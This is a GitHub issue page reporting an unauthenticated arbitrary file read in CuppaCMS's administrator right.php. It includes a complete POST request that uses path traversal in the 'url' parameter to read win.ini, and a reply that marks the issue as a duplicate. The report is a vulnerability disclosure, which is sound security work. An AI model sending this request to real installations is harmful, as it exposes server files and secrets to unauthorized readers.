search

CuppaCMS / CuppaCMS

Cuppa is a project open source, that seeks offer a adaptable CMS to any project (news or exist developments, web, desktop or mobile project) that don't have a Content Manager System and need implement one without realize heavy migration processes, nor take hours learning new, complex structures and methodologies.
10 stars 4 forks source link

Unauthorized Arbitrary File Read vulnerability exists in CuppaCMS /administrator/templates/default/html/windows/right.php #32

Open S1nK0000 opened 2 years ago

S1nK0000 commented 2 years ago

An Unauthorized attacker can read arbitrary file via copy function

request:

POST /cuppa_cms/administrator/templates/default/html/windows/right.php HTTP/1.1
Host: 192.168.174.133
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Content-Length: 272
Accept: */*
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.174.133
Referer: http://192.168.174.133/cuppa_cms/administrator/
X-Requested-With: XMLHttpRequest
Accept-Encoding: gzip

id=1&path=component%2Ftable_manager%2Fview%2Fcu_views&uniqueClass=window_right_246232&url=../../../../../../windows/win.ini

Description: The vulnerability is present in the “/administrator/templates/default/html/windows/right.php" , and can be exploited throuth a POST request via the ‘url’ parameters.

hansmach1ne commented 2 years ago

Check https://github.com/CuppaCMS/CuppaCMS/issues/18, this is a duplicate.